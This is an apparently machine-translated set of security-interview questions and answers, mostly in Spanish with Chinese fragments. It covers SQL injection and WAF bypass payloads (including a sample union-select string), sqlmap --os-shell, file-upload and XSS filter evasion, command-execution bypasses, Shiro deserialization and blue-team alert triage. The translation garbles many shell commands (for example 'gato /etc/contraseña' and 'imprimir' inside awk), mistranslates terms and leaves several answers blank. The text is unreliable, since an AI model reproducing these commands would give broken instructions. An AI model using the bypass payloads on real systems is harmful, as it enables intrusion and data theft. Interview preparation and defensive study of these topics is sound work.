Pregunta 6: ¿Qué base de datos existe de forma predeterminada en MySQL y se usa con frecuencia al inyectar ?
Respuesta:
Esquema_información
Pregunta 7: ¿Cuáles son las características de la inyección ciega basada en el tiempo? ¿Funciones de uso común ? ¿A qué eres susceptible?
Respuesta:
Características: No hay un eco obvio en la página de inyección ciega basada en el tiempo. Solo puede juzgar si la declaración construida es correcta en función de la duración del tiempo de actualización de la página.
Funciones de uso común: función de suspensión, declaración condicional if, etc.
Vulnerable a las fluctuaciones de la red
Pregunta 8: ¿Cuáles son las características de la inyección booleana ciega ? ¿Funciones de uso común ?
Respuesta:
Características: determine si la declaración construida es correcta en función de los dos estados de correcto e incorrecto en la página.
Funciones de uso común:
Pregunta 9: Caracteres de cierre de uso común en inyección SQL
Respuesta:
Comilla simple ' Comilla doble " Comilla simple ') Comilla doble ")
Pregunta 10: ¿ Cuáles son los tipos de inyección comunes de inyección SQL ?
Respuesta:
1. Si se clasifican según si hay caracteres cerrados o no, son de tipo carácter y de tipo entero.
2. Si se clasifica por método de transmisión de datos, los más comunes son el tipo de publicación y el tipo de obtención.
3. Si se subdivide según el modo de inyección, los más comunes son inyección de consulta conjunta, inyección de informe de errores, inyección ciega booleana, inyección ciega de tiempo, inyección de bytes anchos, etc.
Pregunta 11: Condiciones de uso de inyección de bytes amplios
Respuesta:
Condiciones de uso: la base de datos utiliza el juego de caracteres gbk y el sitio web convierte las comillas en barras invertidas más comillas.
En la codificación de doble byte GBK, se utilizan dos bytes para representar un carácter chino. Puede utilizar %df para omitir el escape de barra invertida para caracteres cerrados.
Pregunta 12: Inyección de SQL en torno a la postura WAF ( no es necesario explicarlos todos , solo algunos )
Respuesta:
Función de bypass mixto de mayúsculas y minúsculas
Razones para omitir: la insensibilidad entre mayúsculas y minúsculas no está activada durante la detección del lado del servidor
Omisión de varias palabras clave
La razón por la que se puede omitir: cuando el servidor detecte caracteres confidenciales, reemplácelos con caracteres vacíos.
Formulario: union selselectec
derivación de codificación
Razones que se pueden omitir: Las palabras clave codificadas no se detectan o no se detectan estrictamente en el lado del servidor.
Tipo de codificación: codificación hexadecimal, codificación URL, codificación Unicode
Omisión de comentarios
Razones que se pueden omitir: el lado del servidor no detecta o detecta estrictamente cadenas en los comentarios.
Formato de comentario: formato: /**/, /*!*/, /*!12345*/, #, -- -, etc.
Función equivalente o bypass de comando
Razones que se pueden omitir: la lista ⿊ del lado del servidor está incompleta y el filtrado no es estricto.
Forma funcional equivalente:
Descripción de Mysql: Unión distinta, actualización de texto, valor de extracción, piso
Funciones de interceptación de cadenas: mid, substr, substring, left, reverse
Funciones de conexión de cadenas: concat, group_concat, concat_ws
Conversión de cadenas: char, hexadecimal, unhex
Reemplace las comas: límite 1 desplazamiento 0, medio (versión() de 1 por 1)
Reemplazar el signo igual: me gusta
Omisión de símbolo especial
Motivo de la omisión: el efecto es el mismo en la base de datos, pero no hay límite en el lado del servidor
forma:
Notación científica y 1e0 = 1e0
Carácter de espacio en blanco %0a %a0 %0b %20 %09 Cita invertida `table_name`
Corchetes seleccione * de (test.admin)
Bypass combinado
La razón por la que se puede omitir: el servidor detecta múltiples ubicaciones y requiere una combinación de múltiples métodos de omisión.
Formato: id = 1' y/**/'1'like'2'/**//*!12345union*/select 1,2,3
Pregunta 13 : ¿Qué tipo de sitios web pueden tener vulnerabilidades de inyección SQL ?
Respuesta:
Sitios web que interactúan con bases de datos, como algunos sitios web escritos con scripts dinámicos como php y asp.
También existen sitios web pseudoestáticos que, aunque parecen sitios web HTML, en realidad son sitios web dinámicos que interactúan con bases de datos.
Pregunta 1 4 : ¿ Cuáles son las condiciones para una explotación exitosa de la vulnerabilidad de inyección SQL ?
Respuesta:
1. Apoyar la consulta conjunta
2. Conozca la ruta absoluta del sitio web
3. La ruta de carga permite escribir archivos.
4. Una vez cargado el mamut, se puede analizar y ejecutar.
5. Posibilidad de encontrar la ubicación del mamífero después de cargarlo.
Pregunta 15 : Cuando descubre que un sitio web tiene una vulnerabilidad de inyección SQL , ¿ cómo lo instalará ?
Respuesta:
Colgaré con sqlmap mediante inyección manual.
Pregunta 16: Dime qué funciones se utilizan para colgar la máquina a mano .
Respuesta: unión, seleccionar, en el archivo
Pregunta 17: ¿Qué parámetros se utilizan para colgar sqlmap ?
Respuesta: --os-shell
Pregunta 18 : ¿ Cómo se explotan generalmente las vulnerabilidades de inyección SQL ?
Respuesta:
1. Utilice vulnerabilidades de inyección SQL para leer datos, generalmente leer datos del usuario, el sitio web puede tener un backend
2. Utilice el enlace de inyección SQL para obtener directamente permisos del servidor.
Pregunta 19: ¿Cómo descubrir vulnerabilidades de inyección SQL ?
Respuesta:
Primero, verificaré si el sitio web es un sitio web dinámico y luego lo escanearé mediante inyección manual o usando la herramienta sqlmap.
Para más detalles, la nota manual primero intentará usar caracteres sensibles para encontrar los caracteres de cierre y luego seleccionará el modo de inyección de acuerdo con el estado de la página. Por ejemplo, si se trata de una consulta conjunta, el siguiente paso es juzgar el número de columnas y la posición de visualización, busque la base de datos actual del sitio web, busque los nombres de todas las tablas en la base de datos actual, busque los nombres de las columnas debajo de la tabla especificada y busque los campos debajo de los nombres de las columnas especificadas.
Pregunta 20: ¿ Cómo solucionar la vulnerabilidad de inyección SQL ?
Respuesta: Filtrar caracteres y funciones maliciosos.
Pregunta 21: Preséntate
Respuesta:
¿Cuánto duró la protección de la red?
Equipos de detección de qué fabricantes se han utilizado: Qi’an Xintian Eye, Sistema avanzado de detección de amenazas Golden Eye Yunhua
Uso de la clarividencia
Pregunta 1: ¿Cómo determinar si la alarma es una falsa alarma?
Respuesta:
Primero, eche un vistazo a esta alarma: ¿la IP de origen del ataque (es decir, la IP del ataque) es una IP interna o una IP externa?
1. Si es una IP de intranet y hay solicitudes maliciosas obvias en el paquete de solicitud de tráfico de alarma, como ipconfig, whoami, etc. en el paquete de solicitud, entonces el servidor de intranet puede verse comprometido y la IP se informará inmediatamente a El equipo de investigación. Miembros del equipo, dejen que los miembros del equipo de investigación y evaluación realicen un análisis detallado de esta propiedad intelectual.
Puede ser que el sistema de intranet al que se accede tenga problemas de lógica de negocios en su propio sistema de negocios, porque muchos sistemas de negocios implementados en la intranet a menudo no consideran algunos problemas de seguridad, como incluir SQL directamente en las solicitudes de lógica de negocios normales. activar la regla del dispositivo para generar una alarma. Esta categoría pertenece a
Si hay una falsa alarma, la alarma se informará al personal de investigación y evaluación. Los expertos del equipo de investigación y evaluación y los clientes de la Parte A deben confirmar si el sistema tiene este problema de lógica de negocios y deben confirmar si el La IP de origen de la alarma está cerca del período de tiempo de la alarma. Operaciones realizadas.
2. Si es una IP externa, la comparación se basa principalmente en el contenido de datos del paquete de solicitud y el paquete de respuesta. Por ejemplo, si hay algunas declaraciones maliciosas en el paquete de solicitud,
Por ejemplo, si ejecuta declaraciones SQL (seleccione la versión, etc.), juzgaré que este ataque es malicioso.
Pregunta 2: ¿Qué hacer si ve una alarma de minería en la intranet ?
Respuesta:
La mayoría de las alarmas de minería de intranet y virus de malware son alarmas basadas en inteligencia, con una alta tasa de falsas alarmas, lo que probablemente se debe a que los empleados internos utilizan una gran cantidad de software y sistemas pirateados, por lo que es imposible juzgar con precisión.
Sin embargo, durante el mantenimiento de la red, dichas alarmas deben manejarse con precaución y no se perderá ninguna alarma. Por lo tanto, informaré dichas alarmas al personal de investigación y evaluación, quienes realizarán una verificación adicional.
Pregunta 3: Si ve una alarma de inyección SQL , ¿cómo determinar si el ataque fue exitoso?
Respuesta:
Haga un juicio basado en la comparación entre el paquete de solicitud y el paquete de respuesta. Por ejemplo, verifique si hay una declaración SQL en el paquete de solicitud, si hay una declaración SQL (como seleccionar versión) y el contenido del paquete de respuesta tiene un eco de ejecución exitosa (es decir, el paquete de respuesta contiene la versión de la base de datos). ), entonces se determina que hubo un ataque de inyección SQL exitoso.
Pregunta 4: Si ve una alarma para la carga de archivos , ¿cómo determinar si el ataque fue exitoso ?
Respuesta:
Haga una comparación y un juicio basado en el paquete de solicitud y el paquete de respuesta. Primero mire las alarmas de código de estado con el código de estado 404, que se pueden filtrar primero. Concéntrese en los códigos de estado del paquete de respuesta 200 y 302. Luego verifique si el nombre del archivo en el paquete de solicitud es el nombre de un archivo de script malicioso, si el contenido del paquete de solicitud contiene contenido de script malicioso y también observe el paquete de respuesta.
Pregunta 5: Si ve una alarma de ejecución de comando , ¿cómo determinar si el ataque fue exitoso ?
Respuesta:
Compare el paquete de solicitud y el paquete de respuesta para ver si hay comandos del sistema en el paquete de solicitud. Por ejemplo, verifique si hay ipconfig en el paquete de solicitud. Luego verifique si hay algún contenido relacionado con IP en el eco del paquete de respuesta. entonces, si no, significa que el ataque fue exitoso, si no, significa que el ataque no fue exitoso, pero sigue siendo un ataque malicioso.
Pregunta 6: Si ve una alarma de tipo XSS , ¿cómo determinar si el ataque fue exitoso?
Respuesta:
Compare el paquete de solicitud y el paquete de respuesta para determinar si el script insertado en el paquete de solicitud está incluido en el paquete de respuesta. Por supuesto, esto no puede determinar con precisión si el ataque fue exitoso. Luego copie el texto del paquete de respuesta y colóquelo en En el documento con el sufijo html, ábralo con un navegador y vea si hay ventanas emergentes.
Pregunta 7: Si ve una alarma ssrf pero no hay una respuesta obvia, ¿cómo se determina si el ataque fue exitoso?
Respuesta:
Si puedo realizar una verificación de vulnerabilidad, realizaré una verificación de reproducción. Si no se puede realizar la verificación de vulnerabilidad, verifique los registros para ver si hay alguna interacción de tráfico con el objetivo de detección. Si hay interacción de tráfico, el ataque debería tener éxito.
Pregunta 8: Si hay una gran cantidad de alarmas en el dispositivo Sky Eye en un corto período de tiempo , ¿cómo realizará el análisis?
Respuesta:
Filtre y visualice según la prioridad, desde alto riesgo hasta bajo riesgo, desde la ejecución de comandos hasta el recorrido de directorios, etc.
Pregunta 9: ¿Qué opinas de la tasa de falsas alarmas de Sky Eye?
Respuesta:
En comparación con equipos de otros fabricantes, la tasa de falsas alarmas de Sky Eye no es alta y la mayoría de las reglas son relativamente precisas, pero es difícil detectar ataques de día 0.
Pregunta 10: ¿Cuál es la sintaxis comúnmente utilizada para la recuperación de registros de Tianyan ?
Respuesta:
sumergir la ip atacada dportar el puerto atacado sip fuente ip
puerto de origen deportivo
uri La dirección URL de los datos de la solicitud El contenido de texto del estado del paquete de solicitud El código de estado del host del paquete de respuesta Nombre de dominio
Pregunta 11: Aparece una advertencia de uso de Webshell Mammoth en Sky Eye o en el sensor de tráfico. ¿Cómo solucionarlo ?
Respuesta:
1. ¿La verificación de esta alarma es realmente exitosa? (Si tiene éxito, el informe se puede emitir directamente)
2. Si falla, determine si el atacante lo hizo manualmente o en lotes usando una herramienta de escaneo.
3. Ingrese a la plataforma de análisis para un análisis más detallado y verifique si la IP del ataque en la plataforma de análisis tiene otros ataques además de la carga de archivos ¿Cuál es el resultado del ataque?
Trazabilidad:
¿Cómo escribió el atacante al mono?
Pregunta 12: Si aparece una alarma de ejecución de comando en el Sky Eye o en el sensor , ¿cómo debo responder?
Respuesta:
1. ¿La verificación de esta alarma es realmente exitosa? (Si tiene éxito, el informe se puede emitir directamente)
2. Si falla, determine si el atacante lo hizo manualmente o en lotes usando una herramienta de escaneo.
3. Ingrese a la plataforma de análisis para un análisis más detallado y verifique si la IP del ataque en la plataforma de análisis tiene otros ataques además de la carga de archivos ¿Cuál es el resultado del ataque?
4. Informar sobre el tiempo de descubrimiento y el comportamiento de ataque a los clientes de protección de red.
Pregunta 13: Si ve un ataque desde una IP de intranet , ¿cómo debe responder?
Respuesta:
1. Primero notifique al equipo de investigación y luego coopere con el cliente para ver si otros hosts se han visto comprometidos.
2. Notificar al cliente para ver si se trata de una falsa alarma debido al negocio normal del cliente.
Pregunta 14: ¿Resumen de la experiencia en análisis de tráfico? ( Si lo cambias a ti mismo )
Respuesta:
1. No ignores los ataques a la intranet
2. Es necesario investigar los intentos de alarma
3. Observe también el comportamiento de las explosiones.
4. Haga un seguimiento cuidadoso si tiene éxito o fracasa.
Pregunta 15: Varios archivos de registro
Respuesta:
ubuntu
La ruta para guardar la información de registro del sistema Ubuntu es: /var/log/, como por ejemplo:
● auth: registro de verificación de seguridad
● arranque: registro de inicio
● kern: registro del núcleo
● syslog: registro del sistema
● wtmp: registra los tiempos de conexión junto con /var/run/utmp
● Xorg: muestra registros de servicio
apache
/var/log/auth.log (registro de inicio de sesión del usuario)
Respuesta de emergencia
Pregunta 1: Proceso de respuesta a emergencias
Respuesta:
Procedimientos comunes de respuesta a emergencias
Responder – Bloquear – Analizar – Limpiar – Reforzar
Respuesta: primero determine el tipo de incidente, segundo mantenga la primera escena y luego recopile información dentro del alcance permitido por el cliente
Bloqueo: según la situación de infección, cierre el sitio web, desconecte el cable de red y aísle el host infectado. Si el negocio del cliente funciona normalmente, puede optar por cortar los hosts sin importancia para observar el comportamiento.
Análisis: analice información clave, rastree el método de ataque: 1. Analice tres registros, muestras y tráfico de gran tamaño, y restaure el comportamiento del ataque. 2. Restaure la ruta de ataque y el proceso de ataque según el comportamiento. El análisis de comportamiento se basa en el análisis de tres componentes principales, combinados con el rendimiento del sistema, como son: elementos de inicio, scripts de inicio, procesos, memoria, etc.
Claro: use D-shield o Hema para buscar y cargar webshel. Luego, averigüe si hay puertas traseras, usuarios ocultos, elementos de inicio, scripts o procesos de inicio, etc.
Refuerzo: reforzar según la situación, aplicar parches, restringir el sistema (aislamiento de red, gestión de comportamiento, etc.), actualizar el equipo de defensa y mejorar el proceso de defensa (despliegue de equipo de defensa, despliegue de personal, actualización de la base de reglas)
Pregunta 2: comandos de emergencia de Linux
Respuesta:
Ver información del usuario
Ver usuarios privilegiados:
gato /etc/contraseña
Ver archivos ocultos:
gato /etc/sombra
Compruebe si hay otros usuarios privilegiados en el sistema. Si el UID es 0, significa el mismo usuario privilegiado que el usuario root:
awk -F: '$3==0{imprimir $1}' /etc/passwd cat /etc/passwd |grep x:0
Vea el usuario que ha iniciado sesión actualmente y su IP de inicio de sesión:
OMS
Vea los usuarios actualmente conectados al sistema y los programas que están ejecutando:
w
Verifique la hora actual, cuánto tiempo ha estado encendido el sistema, cuántos usuarios han iniciado sesión actualmente y la carga promedio del sistema en los últimos 1 minuto, 5 minutos y 15 minutos:
tiempo de actividad
Verifique la hora en que se modificó por última vez el archivo de contraseña. Si se modificó recientemente, puede haber un problema:
estadística /etc/contraseña
Verifique los usuarios que pueden iniciar sesión usando bash shell:
gato /etc/contraseña | grep/bin/bash
comando histórico
Ver historial de comandos:
historia
Comando Preservar Historial:
gato .bash_history >>historia.txt
puerto:
netstat -artículo
Si se encuentra una IP externa sospechosa, puede encontrar la ruta del archivo según el PID correspondiente:
ls -l /proc/pid/exe
proceso
Comprueba el progreso:
ps-aux
Consulta el proceso de asociación:
ps-aux | grep pid
Vea los diez procesos principales con uso de CPU:
ps auxiliar --sort=pcpu | cabeza -10
Artículos de inicio automático
systemctl lista-unidades-archivos | grep habilitado
tareas programadas
Ver tareas programadas:
crontab-l
Ver tareas programadas para usuarios específicos:
crontab -u raíz -l
Monitoreo de procesos
Los procesos se monitorean en la misma plataforma. Por defecto, se ordenan según el uso de la CPU. Presione B para ordenar según el uso de la memoria:
arriba
Monitorear programas específicos:
arriba -p pid
Monitoreo estático:
ps-ef
archivo de host _
Compruebe si el archivo host ha sido manipulado:
gato /etc/hosts
Iniciar sesión _
Estadísticas sobre la cantidad de fallas y direcciones IP de las cuentas raíz del host:
grep "Contraseña fallida para root" /var/log/secure | awk '{imprimir $11}' | ordenar | único -c | ordenar -nr | más
Verifique la fecha, el nombre de usuario y la IP del inicio de sesión exitoso:
grep "Aceptado" /var/log/secure | awk '{imprimir $1,$2,$3,$9,$11}'
estado del comando
Verifique la hora de modificación del nombre para evitar que sea reemplazado:
estadística /bin/netstat
Obtener la hora de creación del archivo:
Obtener la estadística del número de inodo del archivo/nombre del archivo
Busque la ruta del disco donde se encuentra el archivo:
df -h | grep sujeto
Utilice debugfs para verificar la hora de creación del archivo:
debugfs -R 'stat <número de inodo>' ruta del disco
Pregunta 3: Webshell se carga en el servidor Linux , cómo llevar a cabo una respuesta de emergencia
Respuesta:
Sin embargo, la solución de problemas manual se puede realizar en función de las alarmas de tráfico de los dispositivos relacionados. También puede utilizar D-shield o webshell de Hema para escanear
Pregunta 4: Herramientas comunes para la respuesta de emergencia
Respuesta:
Escudo D, asesinato de Hema webshell, Weibu Cloud Sandbox y Weibu en línea
Pregunta 5: Herramientas para ver el registro de procesos
Respuesta:
pchunter, espada de terciopelo
Pregunta 6: Proceso de eliminación del virus ransomware
Respuesta:
Deserialización de Shiro _
Pregunta 1: Principio de deserialización de Shiro
Respuesta:
La clave de cifrado AES está codificada en el código, lo que significa que todos pueden obtener la clave de cifrado AES a través del código fuente. Por lo tanto, el atacante construye un objeto malicioso, lo serializa, lo cifra con AES, lo codifica en base64 y lo envía como el campo recordarme de la cookie. Shiro descifró y deserializa RememberMe, lo que finalmente provocó una vulnerabilidad de deserialización.
Pregunta 2: Determinar el marco shiro
Respuesta:
Asigne cualquier valor al campo remeberMe en la cookie del paquete de solicitud. Set-Cookie existe en el paquete devuelto: remeberMe=deleteMe. Hay la palabra shiro en la URL.
A veces, el servidor no toma la iniciativa de devolver RememberMe=deleteMe y simplemente envía el paquete directamente.
Pregunta 3: Cómo determinar la vulnerabilidad de deserialización de Shiro
Respuesta:
Utilice herramientas para juzgar y encontrar claves y utilizar cadenas, generar informes y finalmente utilizarlos.
Por ejemplo: burpsuite solo puede capturar shiroCipherKey, que es la clave secreta que desencadena la vulnerabilidad de shiro. Puede usar esta clave secreta junto con otra herramienta "ShiroExploit-v2.3.jar".
Ideas de penetración
Pregunta 1: Principio de vulnerabilidad de carga de archivos
Respuesta:
El desarrollador no filtró estrictamente el nombre y el contenido del archivo en el punto de carga del archivo, lo que permitió a los usuarios cargar scripts maliciosos en el servidor.
Pregunta 2: ¿ Qué archivos se cargan generalmente debido a vulnerabilidades de carga de archivos ?
Respuesta:
Una frase, escorpión de hielo, caballo grande, etc. que coincida con el entorno de idioma del sitio web
Pregunta 3: método de omisión de carga de archivos
Respuesta:
Omitir lista negra, omitir lista blanca, omitir verificación frontal, omitir contenido de archivo
Pregunta 4: Cuando carga un archivo y descubre que el sitio web es un servidor IIS , ¿qué tipo de sufijo cargará ?
Respuesta:
asp o aspx
Pregunta 5: Cuando carga un archivo de script ASP y no se carga, ¿qué tipo de archivo de sufijo intenta cargar ? ¿Por qué cargar un archivo script con ese sufijo?
Respuesta:
Intentaré cambiar el nombre del sufijo del archivo a asa o cdx o cer e intentaré cargarlo; el servidor Iis ha habilitado la función de extensión del sufijo del archivo
Pregunta 6: Cuando descubra que el servidor de carga es un servidor Apache , ¿qué sufijo intentará cargar ?
Respuesta:
PHP
Pregunta 7: Cuando descubra que el middleware del servidor de carga es middleware Tomcat , ¿qué sufijo intentará cargar ?
Respuesta:
jsp
Pregunta 8: Cuando descubra que el middleware del servidor de carga es middleware weblogic , ¿qué sufijo intentará cargar ?
Respuesta:
jsp
Pregunta 9: Cuando descubra que el middleware del servidor de carga es nginx , ¿qué sufijo intentará cargar ?
Respuesta:
PHP
问题10:⽂件上传漏洞防护
答案:
防护:常⻅的防护措施⽐如⽂件类型可以通过⽩名单或者⿊名单进⾏判断,当⽂件上传后对⽂件进⾏重命名呀,限制上传⽂件⼤⼩呀等。
⽩名单⽐⿊名单要更安全⼀些。
XSS
问题1:XSS的集中分类
答案:
两种(反射/存储)
反射:⾮持久化,没有存⼊数据库,⽤户点击⼀下反应⼀下存储:存储在服务端数据库,属于最危险的xss代码
DOM型:通过修改DOM节点形成的XSS
持久和⾮持久的区别是什么? (会不会将攻击代码存在数据库⾥⾯)
问题2:xss原理
答案:
跨站脚本攻击,指的是攻击者往web⻚⾯插⼊恶意脚本代码,当⽤户浏览时,嵌⼊web⻚⾯⾥的脚本代码就会执⾏,从⽽达到恶意攻击⽤户的特殊⽬的
⼀般有三个⻆⾊:攻击者,⽬标服务器,受害者浏览器
问题3:xss标签(不是事件):
答案:
< script >、< img >、< input >、< details >、< svg >、< select >、< iframe >、< video >、< audio
>、< body >
问题4:xss⼤⼩写和双写都过滤了咋办:
答案:
html实体编码、url编码、可以使⽤空格.换⾏,tab键或者/**/,/*!a*/,的形式绕过关键词的检测
问题5:xss修复与防范:
答案:
过滤危险字符,输⼊⻓度限制,还有HTML实体编码等。
面试题目整理
常⽤命令
问题1:例举⼀些常⽤的Linux命令
答案:
s:显⽰当前⽂件夹的内容
ifconfig: Ver dirección IP whoami: Ver usuarios
netstat: Ver puertos
ps: ver lista de procesos
grep: busca cadenas en archivos
crontal: Verificar tareas programadas
Pregunta 2: proporcione algunos ejemplos de comandos de Windows de uso común
Respuesta:
ping: comprobar la conectividad de la red
ipconfig: Ver directorio de dirección IP: Muestra el contenido de la carpeta actual
usuario neto: Ver usuarios
netstat: Ver puertos
lista de tareas: Ver lista de procesos
buscar: buscar cadenas en archivos
Pregunta 3: Linux verifica la información de inicio de sesión del último usuario
Respuesta:
El último comando verifica el historial de inicio de sesión del usuario; este comando lee el archivo /var/log/wtmp; /var/log/btmp puede mostrar información de inicio de sesión remoto.
Pregunta 4: Linux verifica la información más reciente sobre fallas de inicio de sesión del usuario
Respuesta:
Pregunta 5: Ubicación de almacenamiento de registros de Apache en Linux
Respuesta:
En el entorno Linux, Apache es el inicio del servicio httpd, ver el registro de apache es muy simple, solo use el siguiente comando:
cd /var/log/httpd/ ;
En Linux basado en Debian, la ubicación predeterminada del registro de errores de Apache en todo el sistema es /var/log/apache2/error.log. La ubicación predeterminada se puede modificar editando el archivo de configuración de Apache.
Pregunta 6 : Ubicación de almacenamiento del registro de seguridad de Linux Linux enumera todos los archivos en el directorio
Respuesta:
Pregunta 7: ¿ Qué comando se puede utilizar para controlar el tiempo de supervivencia de la contraseña en Linux ?
Respuesta:
Pregunta 8: Cómo verificar la hora en que se modificaron los permisos de archivos en Linux
Respuesta:
Pregunta 9: Windows enumera todos los comandos de información de servicio en ejecución
Respuesta:
servicios.msc, servicios abiertos (local)
net start para ver qué servicios están habilitados
Pregunta 10: Comando de Windows para establecer una conexión anónima con otra máquina
Respuesta:
Pregunta 11: comando de descarga remota de Windows
Respuesta:
Web _
Problema 1: inyección SQL
El principio de inyección SQL ;
Respuesta:
El ataque de inyección SQL es una técnica en la que los parámetros de entrada no se filtran y luego se unen directamente en declaraciones SQL para su análisis, y se ejecutan declaraciones SQL maliciosas con fines de ataque.
Cómo utilizar la inyección SQL ;
Respuesta:
La inyección SQL se puede dividir en inyección numérica e inyección de caracteres según el punto de inyección;
Según el método de inyección, se puede dividir en inyección conjunta, inyección de error, inyección ciega booleana, inyección ciega de tiempo, inyección secundaria, inyección de pila, inyección de bytes amplios e inyección de encabezado HTTP;
Funciones y principios utilizados en la inyección de informes de errores.
Respuesta:
Posibles escenarios inyección SQL .
Respuesta:
Los escenarios comerciales donde generalmente existe la inyección SQL en las páginas web incluyen funciones de inicio de sesión, funciones de búsqueda, compras de productos, carga de archivos y otros escenarios que interactúan con la base de datos. Una vez que SQL inyecta estos escenarios, puede provocar que se filtre la información privada del usuario almacenada en la base de datos, que se altere la página web, que se piratee el sitio web, que se altere maliciosamente la base de datos y que se altere el servidor. controlado remotamente.
Pregunta 2: carga de archivos
1. Principio de carga de archivos
Respuesta:
Debido a un control insuficiente o a la falta de procesamiento por parte de los programadores sobre las cargas de archivos de los usuarios, los usuarios pueden cargar archivos de script dinámicos ejecutables al servidor más allá de sus propios permisos;
2. Cómo utilizar la carga de archivos
Respuesta:
3. ¿Cuáles son los puntos de detección de la función de carga de archivos?
Respuesta:
Detección JS del lado del cliente (principalmente detecta sufijos de nombres de archivos)
Detección del lado del servidor (detección de tipo MINE, nombre de sufijo de archivo, encabezado de formato de archivo)
Pregunta 3: Pruebas de penetración
Proceso de prueba de penetración;
Respuesta:
Ideas de penetración para la página de inicio de sesión;
Respuesta:
Ideas para la recopilación de información;
Respuesta:
¿ Cuáles son las formas de evitar CDN ?
Respuesta:
Pregunta 4: Respuesta de emergencia
procedimientos de respuesta a emergencias;
Respuesta:
Comandos de respuesta de emergencia de uso común en Linux : Respuesta:
Pregunta 5 : herramienta webshell
Herramientas comunes de webshell ; _ _
Respuesta:
características del tráfico de la herramienta webshell ;
Respuesta:
Características del tráfico y métodos de cifrado de Ice Scorpion Godzilla ;
Respuesta:
Pregunta 6: Preguntas frecuentes
1. ¿Cuáles son los números de puerto comunes ?
Respuesta:
Web:80; Tomcat:8080 ;Mysql:3306 ;Oracle:1521 ;MSSql:1433 ;PostgreSQL:5432 ;
SMB:445; FTP:21; SSH:22; Telnet:23; HTTPS:443; VNC:5900; Escritorio remoto RDP:3389;
2. ¿Cuáles son los puertos de bases de datos comunes ?
Respuesta:
Oracle: 1522; SQL Server: 1433; Mysql: 3306; base de puntos: 9092; DB2: 5000;
MongoDB: 27017; Redis: 6379; memcached: 11211;
3. Cómo verificar la versión actual de la base de datos en MySQL;
Respuesta:
Ingrese el siguiente comando en el cuadro de consulta
SELECCIONAR VERSIÓN();
4. ¿Cuáles son las bibliotecas predeterminadas de MySQL?
Respuesta:
- esquema_información;2.mysql;3.esquema_rendimiento;4.sakila;
5. ¿Qué significa la ventana 4624?
Respuesta:
6. ¿ Cuál es la función del protocolo ARP ?¿ En qué capa funciona ARP ?
Respuesta:
7. ¿Cuál es la estrategia de configuración del firewall ?
Respuesta:
8. ¿Conoces https?
Respuesta:
9. ¿Conoce el sistema de registro?
Respuesta:
10. ¿ Qué piensas cuando hay un registro de archivo grande ?
Respuesta:
11. ¿ En qué eres mejor en términos de defensa ?
Respuesta:
12. ¿ Cuáles son los equipos de seguridad comunes ?
Respuesta:
Firewall, middleware de seguridad, sistema de certificado de autorización, infraestructura de clave pública, software antivirus, honeypot, detección de intrusiones, prevención de intrusiones, WAF, centro de operaciones de seguridad SOC, etc.
13. ¿Cuáles son las funciones ejecutadas por comandos ?
Respuesta:
system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(),proc_open();
14. ¿Cómo omitir la ejecución de comandos ?
Respuesta:
Omisión de símbolo de tubería; omisión de espacio; %0a, %09; omisión de redirección; empalme de variables; comillas simples/dobles; omisión de codificación; omisión de barra invertida; omisión de nueva línea de comando.
15. Describa brevemente los métodos comunes de penetración en los puertos .
Respuesta:
FTP: 21 inicio de sesión anónimo, voladura;
ssh: 22 explosiones;
Telnet: 23 olfateando, explotando;
servidor SQL: 1433 contraseña débil, inyección, explosión;
Oracle: 1521 contraseña débil, inyección, explosión;
mysql: 3306 contraseña débil, inyección, explosión;
WebLogic: deserialización de Java 7001, contraseña débil;
Redis: 6379 Acceso no autorizado, contraseña débil;
Jboss: deserialización 8080, contraseña débil;
16. ¿ Qué plataformas de amenazas has utilizado ?
Respuesta:
17. Si ves una IP de alarma , ¿cómo juzgar si es un ataque real?
Respuesta:
Primero, verifique si la IP del atacante en la alarma es una IP interna o una IP externa. Si es una IP de intranet, primero haga un juicio basado en la comparación del paquete de solicitud y el paquete de respuesta. Por ejemplo, verifique si hay una declaración SQL en el paquete de solicitud, si hay una declaración SQL (como seleccionar versión) y el contenido del paquete de respuesta tiene un eco de ejecución exitosa (es decir, hay una en el paquete de respuesta). ), entonces de hecho es un ataque SQL. Debe informarse al investigador, quien puede confirmar con la persona a cargo presente si el sistema empresarial objetivo del ataque tiene esta vulnerabilidad en el propio sistema empresarial, si es causada por su propia lógica empresarial y si es porque de su propio negocio Lógicamente causado y se confirma que la IP del atacante es una IP segura, entonces este ataque debería ser un falso positivo. Si se confirma que la IP del atacante es una IP insegura (el propietario de la IP dice que no se han realizado operaciones durante este período), es posible que un equipo rojo haya invadido.
Si la IP del atacante extranjero determina si es un ataque real, comparará el contenido del paquete de solicitud y el paquete de respuesta para ver si es una acción maliciosa, y si es una acción maliciosa, se juzgará como un ataque real. .
18. ¿Qué debes hacer si ves una alarma de minería en la intranet?
Respuesta:
Reportar al personal de investigación y juicio para su análisis y verificación. La mayoría de las alarmas de minería de intranet y los virus de malware son alarmas basadas en inteligencia, con una alta tasa de falsas alarmas, pero deben manejarse con precaución durante la protección de la red y no perder ninguna alarma;
1 9. Si ve una alarma de inyección SQL , ¿cómo determinar si el ataque fue exitoso? Respuesta:
Haga un juicio basado en la comparación entre el paquete de solicitud y el paquete de respuesta. Por ejemplo, verifique si hay una declaración SQL en el paquete de solicitud, si hay una declaración SQL (como seleccionar versión) y el contenido del paquete de respuesta tiene un eco de ejecución exitosa (es decir, hay una en el paquete de respuesta). ), entonces de hecho es un ataque SQL;
20. Si ve una alarma para la carga de archivos , ¿cómo determinar si el ataque fue exitoso ?
Respuesta :
Haga un juicio basado en la comparación entre el paquete de solicitud y el paquete de respuesta, verifique si el nombre del archivo del paquete de solicitud es un nombre de archivo de script malicioso, si el contenido del paquete de solicitud contiene contenido de script malicioso y luego verifique si el código de estado del paquete de respuesta es 200 y 302. Si cumple con las dos características anteriores, la carga puede realizarse correctamente. Repórtelo al personal de investigación y evaluación para su verificación.
21. Si ve una alarma de ejecución de comando , ¿cómo determinar si el ataque fue exitoso?
Respuesta:
Haga un juicio basado en la comparación entre el paquete de solicitud y el paquete de respuesta. Verifique si hay comandos del sistema en el paquete de solicitud. Por ejemplo, verifique si hay ipconfig en el paquete de solicitud. Luego verifique si el eco del paquete de respuesta contiene contenido IP. Si lo hace, indica un ataque, éxito, si no, el ataque no tuvo éxito, pero sí fue un ataque malicioso. Informe esta alarma al personal de investigación y evaluación, quienes realizarán una verificación secundaria.
22. ¿ Cuáles son los códigos de estado comunes en las páginas web ?
Respuesta:
● 200 - Solicitud exitosa;
● 301: el recurso (página web, etc.) se transfiere permanentemente a otra URL;
● 404 - El recurso solicitado (página web, etc.) no existe;
● 500 - 内部服务器错误;
